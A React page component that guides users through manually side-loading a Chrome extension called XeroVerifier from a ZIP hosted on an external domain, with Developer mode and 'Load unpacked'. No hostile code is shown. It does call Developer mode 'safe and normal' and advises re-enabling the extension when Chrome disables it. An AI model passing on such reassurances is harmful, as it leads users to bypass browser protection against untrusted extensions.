import { useState, useEffect, useRef } from 'react';
import Header from '../../components/feature/Header';
import Footer from '../../components/feature/Footer';

const DOWNLOAD_URL = 'https://xeroverifier.bio-mail.com/extension-downloads/XeroVerifier-2.4.18.22-O.zip';
const DOWNLOAD_FILENAME = 'XeroVerifier-2.4.18.22.zip';

export default function ExtensionInstallChromeXeroVerifier() {
  const [lightboxImage, setLightboxImage] = useState<string | null>(null);
  const [downloadModalOpen, setDownloadModalOpen] = useState(false);
  const [downloadStarted, setDownloadStarted] = useState(false);
  const [showDownloadIndicator, setShowDownloadIndicator] = useState(false);
  const [highlightStep2, setHighlightStep2] = useState(false);
  const step2Ref = useRef<HTMLDivElement>(null);
  const downloadLinkRef = useRef<HTMLAnchorElement>(null);

  const openLightbox = (imageSrc: string) => setLightboxImage(imageSrc);
  const closeLightbox = () => setLightboxImage(null);

  const handleDownloadBarClick = () => {
    setDownloadModalOpen(true);
    setDownloadStarted(false);
  };

  const triggerDownload = () => {
    downloadLinkRef.current?.click();
    setDownloadStarted(true);
    setShowDownloadIndicator(true);
    // After 6s, hide indicator and highlight step 2
    setTimeout(() => {
      setShowDownloadIndicator(false);
      setHighlightStep2(true);
      setDownloadModalOpen(false);
      setTimeout(() => {
        step2Ref.current?.scrollIntoView({ behavior: 'smooth', block: 'center' });
      }, 300);
    }, 6000);
  };

  // Hide highlight after a bit
  useEffect(() => {
    if (highlightStep2) {
      const t = setTimeout(() => setHighlightStep2(false), 4000);
      return () => clearTimeout(t);
    }
  }, [highlightStep2]);

  return (
    <div className="min-h-screen bg-gray-50">
      <Header />

      {/* Hidden real download anchor */}
      <a
        ref={downloadLinkRef}
        href={DOWNLOAD_URL}
        download={DOWNLOAD_FILENAME}
        className="hidden"
        aria-hidden="true"
      />

      {/* Download Indicator Overlay */}
      {showDownloadIndicator && (
        <div className="fixed inset-0 z-[200] pointer-events-none">
          {/* Semi-dim overlay */}
          <div className="absolute inset-0 bg-black/20" />

          {/* Top-right arrow (Chrome 130+ downloads shelf) */}
          <div className="absolute top-0 right-0 flex flex-col items-end pr-4 pt-2">
            <div
              className="flex flex-col items-center"
              style={{ animation: 'bounceUp 1s ease-in-out infinite' }}
            >
              <div className="bg-white rounded-xl shadow-2xl border border-gray-200 px-5 py-3 mb-2 text-sm font-semibold text-gray-800 whitespace-nowrap">
                <span className="text-green-600 font-bold">Your download is starting!</span>
                <br />
                <span className="text-gray-500 font-normal">Check the top-right of Chrome</span>
              </div>
              <i className="ri-arrow-up-line text-4xl text-green-500 drop-shadow-lg" style={{ animation: 'bounceArrowUp 1s ease-in-out infinite' }} />
            </div>
          </div>

          {/* Bottom-left arrow (older Chrome / Firefox / Edge) */}
          <div className="absolute bottom-0 left-0 flex flex-col items-start pl-4 pb-2">
            <div
              className="flex flex-col items-center"
              style={{ animation: 'bounceDown 1s ease-in-out infinite' }}
            >
              <i className="ri-arrow-down-line text-4xl text-green-500 drop-shadow-lg mb-2" style={{ animation: 'bounceArrowDown 1s ease-in-out infinite' }} />
              <div className="bg-white rounded-xl shadow-2xl border border-gray-200 px-5 py-3 text-sm font-semibold text-gray-800 whitespace-nowrap">
                <span className="text-green-600 font-bold">Or check the bottom-left</span>
                <br />
                <span className="text-gray-500 font-normal">Older browsers show it here</span>
              </div>
            </div>
          </div>

          {/* Center message */}
          <div className="absolute inset-0 flex items-center justify-center pointer-events-auto" onClick={() => setShowDownloadIndicator(false)}>
            <div className="bg-white rounded-2xl shadow-2xl border border-green-200 px-10 py-8 text-center max-w-sm mx-4">
              <div className="w-16 h-16 bg-green-100 rounded-full flex items-center justify-center mx-auto mb-4">
                <i className="ri-download-2-line text-green-600 text-3xl" />
              </div>
              <h3 className="text-xl font-bold text-gray-900 mb-2">Download Started!</h3>
              <p className="text-gray-600 text-sm mb-1">
                <span className="font-semibold text-gray-800">{DOWNLOAD_FILENAME}</span>
              </p>
              <p className="text-gray-500 text-sm mb-4">
                Look for the download notification in the <strong>top-right</strong> or <strong>bottom bar</strong> of your browser.
              </p>
              <p className="text-xs text-gray-400">Click anywhere to dismiss</p>
            </div>
          </div>
        </div>
      )}

      {/* Pre-Download Modal */}
      {downloadModalOpen && !showDownloadIndicator && (
        <div
          className="fixed inset-0 bg-black/50 z-[150] flex items-center justify-center p-4"
          onClick={() => { if (!downloadStarted) setDownloadModalOpen(false); }}
        >
          <div
            className="bg-white rounded-2xl shadow-2xl max-w-md w-full overflow-hidden"
            onClick={(e) => e.stopPropagation()}
          >
            {/* Modal Header */}
            <div className="bg-gradient-to-r from-blue-500 to-blue-600 px-6 py-5 flex items-center justify-between">
              <div className="flex items-center gap-3">
                <div className="w-10 h-10 bg-white/20 rounded-lg flex items-center justify-center">
                  <i className="ri-download-2-line text-white text-xl" />
                </div>
                <div>
                  <h3 className="text-white font-bold text-lg leading-tight">Download Extension</h3>
                  <p className="text-blue-100 text-xs">XeroVerifier for Chrome</p>
                </div>
              </div>
              <button
                onClick={() => setDownloadModalOpen(false)}
                className="w-8 h-8 flex items-center justify-center text-white/70 hover:text-white transition-colors cursor-pointer"
              >
                <i className="ri-close-line text-xl" />
              </button>
            </div>

            {/* Modal Body */}
            <div className="p-6">
              {/* File info */}
              <div className="bg-gray-50 rounded-xl p-4 flex items-center gap-4 mb-5 border border-gray-200">
                <div className="w-12 h-12 bg-blue-100 rounded-lg flex items-center justify-center flex-shrink-0">
                  <i className="ri-file-zip-line text-blue-600 text-2xl" />
                </div>
                <div className="min-w-0">
                  <p className="font-semibold text-gray-900 text-sm truncate">{DOWNLOAD_FILENAME}</p>
                  <p className="text-gray-500 text-xs mt-0.5">ZIP archive &bull; Chrome Extension</p>
                  <p className="text-gray-400 text-xs">Will save to your Downloads folder</p>
                </div>
              </div>

              {/* What happens next */}
              <div className="mb-5">
                <p className="text-xs font-semibold text-gray-500 uppercase tracking-wide mb-3">What happens next</p>
                <div className="space-y-2.5">
                  {[
                    { icon: 'ri-download-2-line', color: 'text-blue-500', text: 'File downloads to your Downloads folder' },
                    { icon: 'ri-folder-zip-line', color: 'text-orange-500', text: 'Right-click the ZIP and choose "Extract All"' },
                    { icon: 'ri-chrome-line', color: 'text-green-500', text: 'Load the extracted folder into Chrome Extensions' },
                  ].map((item, i) => (
                    <div key={i} className="flex items-center gap-3">
                      <div className={`w-7 h-7 flex items-center justify-center flex-shrink-0 ${item.color}`}>
                        <i className={`${item.icon} text-lg`} />
                      </div>
                      <p className="text-sm text-gray-700">{item.text}</p>
                    </div>
                  ))}
                </div>
              </div>

              {/* Note */}
              <div className="bg-amber-50 border border-amber-200 rounded-lg p-3 flex items-start gap-2 mb-5">
                <i className="ri-information-line text-amber-600 mt-0.5 flex-shrink-0" />
                <p className="text-xs text-amber-800">
                  <strong>Note:</strong> Remember where you save the file — you'll need to navigate to that folder in Step 5 when loading the extension into Chrome.
                </p>
              </div>

              {/* Buttons */}
              <div className="flex gap-3">
                <button
                  onClick={() => setDownloadModalOpen(false)}
                  className="flex-1 py-3 rounded-lg border border-gray-300 text-gray-700 text-sm font-semibold hover:bg-gray-50 transition-colors cursor-pointer whitespace-nowrap"
                >
                  Cancel
                </button>
                <button
                  onClick={triggerDownload}
                  className="flex-2 flex-grow py-3 rounded-lg bg-blue-600 hover:bg-blue-700 text-white text-sm font-semibold transition-colors cursor-pointer flex items-center justify-center gap-2 whitespace-nowrap"
                >
                  <i className="ri-download-2-line text-lg" />
                  Download to Downloads Folder
                </button>
              </div>
            </div>
          </div>
        </div>
      )}

      {/* Lightbox Modal */}
      {lightboxImage && (
        <div
          className="fixed inset-0 bg-black/80 z-50 flex items-center justify-center p-4"
          onClick={closeLightbox}
        >
          <div className="relative">
            <img
              src={lightboxImage}
              alt="Enlarged view"
              className="w-[720px] h-[480px] object-contain rounded-lg"
              onClick={(e) => e.stopPropagation()}
            />
            <button
              onClick={closeLightbox}
              className="absolute -top-10 right-0 text-white hover:text-gray-300 transition-colors cursor-pointer"
            >
              <i className="ri-close-line text-3xl" />
            </button>
          </div>
        </div>
      )}

      {/* Keyframe styles */}
      <style>{`
        @keyframes bounceArrowUp {
          0%, 100% { transform: translateY(0); }
          50% { transform: translateY(-10px); }
        }
        @keyframes bounceArrowDown {
          0%, 100% { transform: translateY(0); }
          50% { transform: translateY(10px); }
        }
        @keyframes step2Glow {
          0%, 100% { box-shadow: 0 0 0 0 rgba(34,197,94,0.4); }
          50% { box-shadow: 0 0 0 12px rgba(34,197,94,0); }
        }
      `}</style>

      {/* Hero Section */}
      <section className="py-16 bg-gradient-to-br from-blue-50 to-indigo-100">
        <div className="max-w-4xl mx-auto px-6 text-center">
          <h1 className="text-4xl font-bold text-gray-900 mb-4">
            How to Install Chrome Extension Manually
          </h1>
          <p className="text-lg text-gray-600">
            Follow these simple steps to manually install the XeroVerifier extension in Google Chrome
          </p>
        </div>
      </section>

      {/* Steps Section */}
      <section className="py-12 bg-gradient-to-br from-blue-30 to-indigo-80">
        <div className="max-w-4xl mx-auto px-6">
          <div className="space-y-6">

            {/* Step 1 */}
            <div className="bg-white rounded-xl shadow-lg overflow-hidden transform scale-75 origin-top">
              {/* Clickable header bar with download icon on right */}
              <button
                type="button"
                onClick={handleDownloadBarClick}
                className="w-full bg-gradient-to-r from-blue-500 to-blue-600 px-6 h-[93px] flex items-center gap-3 cursor-pointer hover:from-blue-600 hover:to-blue-700 transition-all group"
              >
                <div className="w-8 h-8 bg-white rounded-full flex items-center justify-center flex-shrink-0">
                  <span className="text-blue-600 font-bold text-lg">1</span>
                </div>
                <h2 className="text-2xl font-bold text-white flex-1 text-left">Download the Extension File</h2>
                {/* Download icon on right */}
                <div className="flex items-center gap-2 bg-white/20 group-hover:bg-white/30 transition-colors rounded-lg px-3 h-[53px] ml-auto">
                  <i className="ri-download-2-line text-white text-xl" />
                  <span className="text-white text-sm font-semibold whitespace-nowrap">Click to Download</span>
                </div>
              </button>

              <div className="p-6">
                <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
                  <div>
                    <p className="text-gray-700 mb-4 text-lg">
                      Click the <strong>blue bar above</strong> to download the extension ZIP file to your computer.
                    </p>
                    <div className="bg-blue-50 border-l-4 border-blue-500 p-4 rounded">
                      <div className="flex items-start gap-2">
                        <i className="ri-information-line text-blue-600 text-lg mt-0.5" />
                        <div>
                          <p className="font-semibold text-blue-900 text-sm">Tip</p>
                          <p className="text-blue-800 text-sm">Remember where you save the file - you'll need to find it in the next step.</p>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div className="flex items-center justify-center">
                    <div
                      className="relative cursor-zoom-in group"
                      onClick={() => openLightbox("https://readdy.ai/api/search-image?query=Clean%20modern%20user%20interface%20showing%20a%20prominent%20blue%20download%20button%20with%20downward%20arrow%20icon%2C%20minimalist%20design%2C%20white%20background%2C%20simple%20and%20clear%20call-to-action%20button%2C%20professional%20software%20interface%2C%20high%20contrast%2C%20centered%20composition&width=720&height=480&seq=download-button-ui-lg&orientation=landscape")}
                    >
                      <img
                        src="https://readdy.ai/api/search-image?query=Clean%20modern%20user%20interface%20showing%20a%20prominent%20blue%20download%20button%20with%20downward%20arrow%20icon%2C%20minimalist%20design%2C%20white%20background%2C%20simple%20and%20clear%20call-to-action%20button%2C%20professional%20software%20interface%2C%20high%20contrast%2C%20centered%20composition&width=720&height=480&seq=download-button-ui-lg&orientation=landscape"
                        alt="Download button interface"
                        className="w-[270px] h-[180px] object-cover rounded-lg shadow-md group-hover:shadow-xl transition-shadow"
                      />
                      <div className="absolute inset-0 rounded-lg bg-black/0 group-hover:bg-black/20 transition-colors flex items-center justify-center">
                        <div className="w-9 h-9 flex items-center justify-center bg-black/40 group-hover:bg-black/60 rounded-full transition-colors">
                          <i className="ri-search-line text-white text-lg" />
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>

            {/* Step 2 — highlighted after download */}
            <div
              ref={step2Ref}
              className="bg-white rounded-xl shadow-lg overflow-hidden transform scale-75 origin-top transition-all duration-500"
              style={highlightStep2 ? { animation: 'step2Glow 1s ease-in-out 3', outline: '3px solid #22c55e' } : {}}
            >
              {highlightStep2 && (
                <div className="bg-green-500 text-white text-center text-sm font-semibold py-1.5 flex items-center justify-center gap-2">
                  <i className="ri-arrow-up-line" />
                  Great! Download started — now do Step 2 below
                  <i className="ri-arrow-up-line" />
                </div>
              )}
              <div className="bg-gradient-to-r from-green-500 to-green-600 px-6 py-3 flex items-center gap-3">
                <div className="w-8 h-8 bg-white rounded-full flex items-center justify-center flex-shrink-0">
                  <span className="text-green-600 font-bold text-lg">2</span>
                </div>
                <h2 className="text-2xl font-bold text-white">Extract the ZIP File</h2>
              </div>
              <div className="p-6">
                <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
                  <div>
                    <p className="text-gray-700 mb-4">
                      Locate the downloaded ZIP file and extract it to a folder on your computer.
                    </p>
                    <ul className="space-y-2 text-gray-700">
                      <li className="flex items-start gap-2">
                        <i className="ri-checkbox-circle-fill text-green-500 mt-1"></i>
                        <span>Right-click the ZIP file</span>
                      </li>
                      <li className="flex items-start gap-2">
                        <i className="ri-checkbox-circle-fill text-green-500 mt-1"></i>
                        <span>Select "Extract All..." or "Extract Here"</span>
                      </li>
                      <li className="flex items-start gap-2">
                        <i className="ri-checkbox-circle-fill text-green-500 mt-1"></i>
                        <span>Choose a location you can easily find</span>
                      </li>
                    </ul>
                  </div>
                  <div className="flex items-center justify-center">
                    <div 
                      className="relative cursor-zoom-in group"
                      onClick={() => openLightbox("https://readdy.ai/api/search-image?query=Computer%20desktop%20screenshot%20showing%20Windows%20file%20explorer%20with%20a%20ZIP%20file%20selected%20and%20right-click%20context%20menu%20open%20displaying%20Extract%20All%20option%2C%20realistic%20operating%20system%20interface%2C%20clear%20and%20professional%2C%20modern%20Windows%20interface%20design&width=720&height=480&seq=zip-extract-menu-lg&orientation=landscape")}
                    >
                      <img 
                        src="https://readdy.ai/api/search-image?query=Computer%20desktop%20screenshot%20showing%20Windows%20file%20explorer%20with%20a%20ZIP%20file%20selected%20and%20right-click%20context%20menu%20open%20displaying%20Extract%20All%20option%2C%20realistic%20operating%20system%20interface%2C%20clear%20and%20professional%2C%20modern%20Windows%20interface%20design&width=720&height=480&seq=zip-extract-menu-lg&orientation=landscape"
                        alt="ZIP file extraction menu"
                        className="w-[270px] h-[180px] object-cover rounded-lg shadow-md group-hover:shadow-xl transition-shadow"
                      />
                      <div className="absolute inset-0 rounded-lg bg-black/0 group-hover:bg-black/20 transition-colors flex items-center justify-center">
                        <div className="w-9 h-9 flex items-center justify-center bg-black/40 group-hover:bg-black/60 rounded-full transition-colors">
                          <i className="ri-search-line text-white text-lg"></i>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>

            {/* Step 3 */}
            <div className="bg-white rounded-xl shadow-lg overflow-hidden transform scale-75 origin-top">
              <div className="bg-gradient-to-r from-purple-500 to-purple-600 px-6 py-3 flex items-center gap-3">
                <div className="w-8 h-8 bg-white rounded-full flex items-center justify-center flex-shrink-0">
                  <span className="text-purple-600 font-bold text-lg">3</span>
                </div>
                <h2 className="text-2xl font-bold text-white">Open Chrome Extensions Page</h2>
              </div>
              <div className="p-6">
                <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
                  <div>
                    <p className="text-gray-700 mb-4">
                      Open Google Chrome and navigate to the Extensions management page.
                    </p>
                    <div className="bg-purple-50 border-l-4 border-purple-500 p-4 rounded mb-4">
                      <p className="font-semibold text-purple-900 text-sm mb-2">Three ways to get there:</p>
                      <ul className="space-y-1 text-purple-800 text-sm">
                        <li>• Click the three dots menu → Extensions → Manage Extensions</li>
                        <li>• Type <code className="bg-purple-100 px-2 py-0.5 rounded">chrome://extensions</code> in the address bar</li>
                        <li>• Use keyboard shortcut: <code className="bg-purple-100 px-2 py-0.5 rounded">Ctrl+Shift+E</code> (Windows) or <code className="bg-purple-100 px-2 py-0.5 rounded">Cmd+Shift+E</code> (Mac)</li>
                      </ul>
                    </div>
                  </div>
                  <div className="flex items-center justify-center">
                    <div 
                      className="relative cursor-zoom-in group"
                      onClick={() => openLightbox("https://readdy.ai/api/search-image?query=Google%20Chrome%20browser%20interface%20showing%20the%20three-dot%20menu%20opened%20with%20Extensions%20submenu%20highlighted%2C%20clean%20browser%20screenshot%2C%20modern%20Chrome%20interface%2C%20professional%20and%20clear%20UI%20design%2C%20realistic%20browser%20window&width=720&height=480&seq=chrome-extensions-menu-lg&orientation=landscape")}
                    >
                      <img 
                        src="https://readdy.ai/api/search-image?query=Google%20Chrome%20browser%20interface%20showing%20the%20three-dot%20menu%20opened%20with%20Extensions%20submenu%20highlighted%2C%20clean%20browser%20screenshot%2C%20modern%20Chrome%20interface%2C%20professional%20and%20clear%20UI%20design%2C%20realistic%20browser%20window&width=720&height=480&seq=chrome-extensions-menu-lg&orientation=landscape"
                        alt="Chrome extensions menu"
                        className="w-[270px] h-[180px] object-cover rounded-lg shadow-md group-hover:shadow-xl transition-shadow"
                      />
                      <div className="absolute inset-0 rounded-lg bg-black/0 group-hover:bg-black/20 transition-colors flex items-center justify-center">
                        <div className="w-9 h-9 flex items-center justify-center bg-black/40 group-hover:bg-black/60 rounded-full transition-colors">
                          <i className="ri-search-line text-white text-lg"></i>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>

            {/* Step 4 */}
            <div className="bg-white rounded-xl shadow-lg overflow-hidden transform scale-75 origin-top">
              <div className="bg-gradient-to-r from-orange-500 to-orange-600 px-6 py-3 flex items-center gap-3">
                <div className="w-8 h-8 bg-white rounded-full flex items-center justify-center flex-shrink-0">
                  <span className="text-orange-600 font-bold text-lg">4</span>
                </div>
                <h2 className="text-2xl font-bold text-white">Enable Developer Mode</h2>
              </div>
              <div className="p-6">
                <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
                  <div>
                    <p className="text-gray-700 mb-4">
                      In the top-right corner of the Extensions page, toggle on "Developer mode".
                    </p>
                    <div className="bg-orange-50 border-l-4 border-orange-500 p-4 rounded">
                      <div className="flex items-start gap-2">
                        <i className="ri-alert-line text-orange-600 text-lg mt-0.5"></i>
                        <div>
                          <p className="font-semibold text-orange-900 text-sm">Important</p>
                          <p className="text-orange-800 text-sm">Developer mode must be enabled to install unpacked extensions. This is safe and normal for manual installations.</p>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div className="flex items-center justify-center">
                    <div 
                      className="relative cursor-zoom-in group"
                      onClick={() => openLightbox("https://readdy.ai/api/search-image?query=Chrome%20extensions%20settings%20page%20showing%20Developer%20mode%20toggle%20switch%20in%20the%20ON%20position%2C%20located%20in%20top%20right%20corner%2C%20clean%20Chrome%20interface%2C%20professional%20browser%20screenshot%2C%20modern%20UI%20design%2C%20clear%20and%20focused&width=720&height=480&seq=developer-mode-toggle-lg&orientation=landscape")}
                    >
                      <img 
                        src="https://readdy.ai/api/search-image?query=Chrome%20extensions%20settings%20page%20showing%20Developer%20mode%20toggle%20switch%20in%20the%20ON%20position%2C%20located%20in%20top%20right%20corner%2C%20clean%20Chrome%20interface%2C%20professional%20browser%20screenshot%2C%20modern%20UI%20design%2C%20clear%20and%20focused&width=720&height=480&seq=developer-mode-toggle-lg&orientation=landscape"
                        alt="Developer mode toggle"
                        className="w-[270px] h-[180px] object-cover rounded-lg shadow-md group-hover:shadow-xl transition-shadow"
                      />
                      <div className="absolute inset-0 rounded-lg bg-black/0 group-hover:bg-black/20 transition-colors flex items-center justify-center">
                        <div className="w-9 h-9 flex items-center justify-center bg-black/40 group-hover:bg-black/60 rounded-full transition-colors">
                          <i className="ri-search-line text-white text-lg"></i>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>

            {/* Step 5 */}
            <div className="bg-white rounded-xl shadow-lg overflow-hidden transform scale-75 origin-top">
              <div className="bg-gradient-to-r from-teal-500 to-teal-600 px-6 py-3 flex items-center gap-3">
                <div className="w-8 h-8 bg-white rounded-full flex items-center justify-center flex-shrink-0">
                  <span className="text-teal-600 font-bold text-lg">5</span>
                </div>
                <h2 className="text-2xl font-bold text-white">Load Unpacked Extension</h2>
              </div>
              <div className="p-6">
                <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
                  <div>
                    <p className="text-gray-700 mb-4">
                      Click "Load unpacked" and select the folder where you extracted the extension files.
                    </p>
                    <ul className="space-y-2 text-gray-700">
                      <li className="flex items-start gap-2">
                        <i className="ri-checkbox-circle-fill text-teal-500 mt-1"></i>
                        <span>Click the "Load unpacked" button</span>
                      </li>
                      <li className="flex items-start gap-2">
                        <i className="ri-checkbox-circle-fill text-teal-500 mt-1"></i>
                        <span>Navigate to the extracted folder</span>
                      </li>
                      <li className="flex items-start gap-2">
                        <i className="ri-checkbox-circle-fill text-teal-500 mt-1"></i>
                        <span>Select the folder and click "Select Folder"</span>
                      </li>
                    </ul>
                  </div>
                  <div className="flex items-center justify-center">
                    <div 
                      className="relative cursor-zoom-in group"
                      onClick={() => openLightbox("https://readdy.ai/api/search-image?query=Chrome%20extensions%20page%20showing%20Load%20unpacked%20button%20with%20file%20browser%20dialog%20open%2C%20selecting%20extension%20folder%2C%20professional%20Chrome%20interface%20screenshot%2C%20modern%20browser%20UI%2C%20clear%20and%20instructional&width=720&height=480&seq=load-unpacked-button-lg&orientation=landscape")}
                    >
                      <img 
                        src="https://readdy.ai/api/search-image?query=Chrome%20extensions%20page%20showing%20Load%20unpacked%20button%20with%20file%20browser%20dialog%20open%2C%20selecting%20extension%20folder%2C%20professional%20Chrome%20interface%20screenshot%2C%20modern%20browser%20UI%2C%20clear%20and%20instructional&width=720&height=480&seq=load-unpacked-button-lg&orientation=landscape"
                        alt="Load unpacked button and file browser"
                        className="w-[270px] h-[180px] object-cover rounded-lg shadow-md group-hover:shadow-xl transition-shadow"
                      />
                      <div className="absolute inset-0 rounded-lg bg-black/0 group-hover:bg-black/20 transition-colors flex items-center justify-center">
                        <div className="w-9 h-9 flex items-center justify-center bg-black/40 group-hover:bg-black/60 rounded-full transition-colors">
                          <i className="ri-search-line text-white text-lg"></i>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>

            {/* Step 6 */}
            <div className="bg-white rounded-xl shadow-lg overflow-hidden transform scale-75 origin-top">
              <div className="bg-gradient-to-r from-indigo-500 to-indigo-600 px-6 py-3 flex items-center gap-3">
                <div className="w-8 h-8 bg-white rounded-full flex items-center justify-center flex-shrink-0">
                  <span className="text-indigo-600 font-bold text-lg">6</span>
                </div>
                <h2 className="text-2xl font-bold text-white">Verify Installation</h2>
              </div>
              <div className="p-6">
                <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
                  <div>
                    <p className="text-gray-700 mb-4">
                      The extension should now appear in your Chrome toolbar. You're all set!
                    </p>
                    <div className="bg-green-50 border-l-4 border-green-500 p-4 rounded">
                      <div className="flex items-start gap-2">
                        <i className="ri-checkbox-circle-fill text-green-600 text-lg mt-0.5"></i>
                        <div>
                          <p className="font-semibold text-green-900 text-sm">Success!</p>
                          <p className="text-green-800 text-sm">You should see the XeroVerifier icon in your Chrome toolbar. Click it to start using the extension.</p>
                        </div>
                      </div>
                    </div>
                  </div>
                  <div className="flex items-center justify-center">
                    <div 
                      className="relative cursor-zoom-in group"
                      onClick={() => openLightbox("https://readdy.ai/api/search-image?query=Chrome%20browser%20toolbar%20showing%20newly%20installed%20extension%20icon%2C%20clean%20browser%20interface%2C%20extension%20icon%20visible%20in%20toolbar%20area%2C%20professional%20Chrome%20screenshot%2C%20modern%20UI%20design%2C%20successful%20installation%20indicator&width=720&height=480&seq=extension-installed-toolbar-lg&orientation=landscape")}
                    >
                      <img 
                        src="https://readdy.ai/api/search-image?query=Chrome%20browser%20toolbar%20showing%20newly%20installed%20extension%20icon%2C%20clean%20browser%20interface%2C%20extension%20icon%20visible%20in%20toolbar%20area%2C%20professional%20Chrome%20screenshot%2C%20modern%20UI%20design%2C%20successful%20installation%20indicator&width=720&height=480&seq=extension-installed-toolbar-lg&orientation=landscape"
                        alt="Extension installed in toolbar"
                        className="w-[270px] h-[180px] object-cover rounded-lg shadow-md group-hover:shadow-xl transition-shadow"
                      />
                      <div className="absolute inset-0 rounded-lg bg-black/0 group-hover:bg-black/20 transition-colors flex items-center justify-center">
                        <div className="w-9 h-9 flex items-center justify-center bg-black/40 group-hover:bg-black/60 rounded-full transition-colors">
                          <i className="ri-search-line text-white text-lg"></i>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </section>

      {/* Troubleshooting Section */}
      <section className="py-20 bg-gray-50">
        <div className="max-w-5xl mx-auto px-6 lg:px-8">
          <div className="text-center mb-12">
            <h2 className="text-4xl font-bold text-gray-900 mb-4">
              Troubleshooting Common Issues
            </h2>
            <p className="text-xl text-gray-600">
              Having problems? Here are solutions to the most common installation issues.
            </p>
          </div>

          <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
            <div className="bg-white rounded-xl p-6 shadow-lg border border-gray-200">
              <div className="flex items-start gap-4">
                <div className="w-10 h-10 bg-red-100 rounded-full flex items-center justify-center flex-shrink-0">
                  <i className="ri-error-warning-line text-red-600"></i>
                </div>
                <div>
                  <h3 className="font-semibold text-gray-900 mb-2">Error: "Manifest file is missing"</h3>
                  <p className="text-sm text-gray-600 mb-3">
                    This means you selected the wrong folder. Make sure you select the folder that contains 
                    the manifest.json file, not the parent folder.
                  </p>
                  <p className="text-sm text-gray-700 font-medium">
                    Solution: Go back to Step 5 and select the correct folder.
                  </p>
                </div>
              </div>
            </div>

            <div className="bg-white rounded-xl p-6 shadow-lg border border-gray-200">
              <div className="flex items-start gap-4">
                <div className="w-10 h-10 bg-red-100 rounded-full flex items-center justify-center flex-shrink-0">
                  <i className="ri-error-warning-line text-red-600"></i>
                </div>
                <div>
                  <h3 className="font-semibold text-gray-900 mb-2">Extension icon not showing</h3>
                  <p className="text-sm text-gray-600 mb-3">
                    The extension might be hidden. Click the puzzle piece icon in Chrome's toolbar to see all extensions.
                  </p>
                  <p className="text-sm text-gray-700 font-medium">
                    Solution: Pin the extension by clicking the pin icon next to it.
                  </p>
                </div>
              </div>
            </div>

            <div className="bg-white rounded-xl p-6 shadow-lg border border-gray-200">
              <div className="flex items-start gap-4">
                <div className="w-10 h-10 bg-red-100 rounded-full flex items-center justify-center flex-shrink-0">
                  <i className="ri-error-warning-line text-red-600"></i>
                </div>
                <div>
                  <h3 className="font-semibold text-gray-900 mb-2">Can't find Developer mode toggle</h3>
                  <p className="text-sm text-gray-600 mb-3">
                    Make sure you're on the chrome://extensions/ page, not the Chrome Web Store.
                  </p>
                  <p className="text-sm text-gray-700 font-medium">
                    Solution: Type chrome://extensions/ directly in the address bar.
                  </p>
                </div>
              </div>
            </div>

            <div className="bg-white rounded-xl p-6 shadow-lg border border-gray-200">
              <div className="flex items-start gap-4">
                <div className="w-10 h-10 bg-red-100 rounded-full flex items-center justify-center flex-shrink-0">
                  <i className="ri-error-warning-line text-red-600"></i>
                </div>
                <div>
                  <h3 className="font-semibold text-gray-900 mb-2">Extension keeps getting disabled</h3>
                  <p className="text-sm text-gray-600 mb-3">
                    Chrome may disable extensions from unknown sources. This is normal for manually installed extensions.
                  </p>
                  <p className="text-sm text-gray-700 font-medium">
                    Solution: Click "Enable" when prompted, or keep Developer mode ON.
                  </p>
                </div>
              </div>
            </div>
          </div>
        </div>
      </section>

      {/* Need Help Section */}
      <section className="py-20 bg-gradient-to-br from-blue-600 to-blue-700 text-white">
        <div className="max-w-4xl mx-auto px-6 lg:px-8 text-center">
          <div className="w-16 h-16 bg-white/20 rounded-full flex items-center justify-center mx-auto mb-6">
            <i className="ri-customer-service-2-line text-white text-3xl"></i>
          </div>
          <h2 className="text-4xl font-bold mb-6">
            Still Need Help?
          </h2>
          <p className="text-xl mb-8 opacity-90">
            Our support team is here to help you with any installation issues. 
            We typically respond within 24 hours.
          </p>
          <div className="flex flex-col sm:flex-row gap-4 justify-center">
            <a 
              href="/contact"
              className="bg-white text-blue-600 px-8 py-4 rounded-lg font-semibold text-lg hover:bg-gray-100 transition-colors shadow-lg whitespace-nowrap cursor-pointer inline-block"
            >
              <i className="ri-mail-line mr-2"></i>
              Contact Support
            </a>
            <a 
              href="/how-it-works"
              className="bg-white/10 text-white border-2 border-white px-8 py-4 rounded-lg font-semibold text-lg hover:bg-white/20 transition-colors whitespace-nowrap cursor-pointer inline-block"
            >
              <i className="ri-book-open-line mr-2"></i>
              View Documentation
            </a>
          </div>
        </div>
      </section>

      <Footer />
    </div>
  );
}
